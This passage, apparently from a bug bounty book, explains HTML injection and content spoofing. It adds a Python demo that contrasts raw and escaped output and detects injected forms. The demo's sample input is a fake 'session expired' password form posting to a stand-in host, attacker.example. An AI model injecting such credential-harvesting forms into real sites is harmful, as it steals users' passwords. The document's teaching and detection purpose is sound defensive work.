Hypertext Markup Language (HTML) injection and content spoofing are attacks that allow a malicious user to inject content into a site’s web pages. The attacker can inject HTML elements of their own design, most commonly as a <form> tag that mimics a legitimate login screen in order to trick targets into submitting sensitive information to a malicious site. Because these types of attacks rely on fooling targets (a practice sometimes called social engineering), bug bounty programs view content spoofing and HTML injection as less severe than other vulnerabilities covered in this book.
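To make the injected-form scenario above concrete from the defender's side, here is an added example (not code from the book) that renders the same input with and without output encoding and then lists the `<form>` elements a browser would actually parse. The page template, the function names, and the `attacker.example` host are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed template for a hypothetical search page that reflects user input.
TEMPLATE = "<html><body><p>Results for: {query}</p></body></html>"

# Constructed input of the kind the paragraph describes: a form that
# posts to a host the site does not control (placeholder domain).
SPOOFED_FORM = (
    '<form action="https://attacker.example/collect" method="post">'
    'Session expired. Password: <input type="password" name="pw">'
    '</form>'
)

def render_vulnerable(query: str) -> str:
    """Reflects input verbatim, so markup in it becomes part of the page."""
    return TEMPLATE.format(query=query)

def render_escaped(query: str) -> str:
    """Encodes &, <, > and quotes so the input is displayed as text."""
    return TEMPLATE.format(query=html.escape(query, quote=True))

class FormFinder(HTMLParser):
    """Collects the action attribute of every <form> start tag in a page."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action"))

def form_actions(page: str) -> list:
    """Returns the action URL of each form element found in the page."""
    finder = FormFinder()
    finder.feed(page)
    finder.close()
    return finder.actions

if __name__ == "__main__":
    for render in (render_vulnerable, render_escaped):
        print(render.__name__, form_actions(render(SPOOFED_FORM)))
```

The same `form_actions` check can be run over rendered pages in a test suite to flag any form whose action points outside the site's own origin.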

An HTML injection vulnerability ...
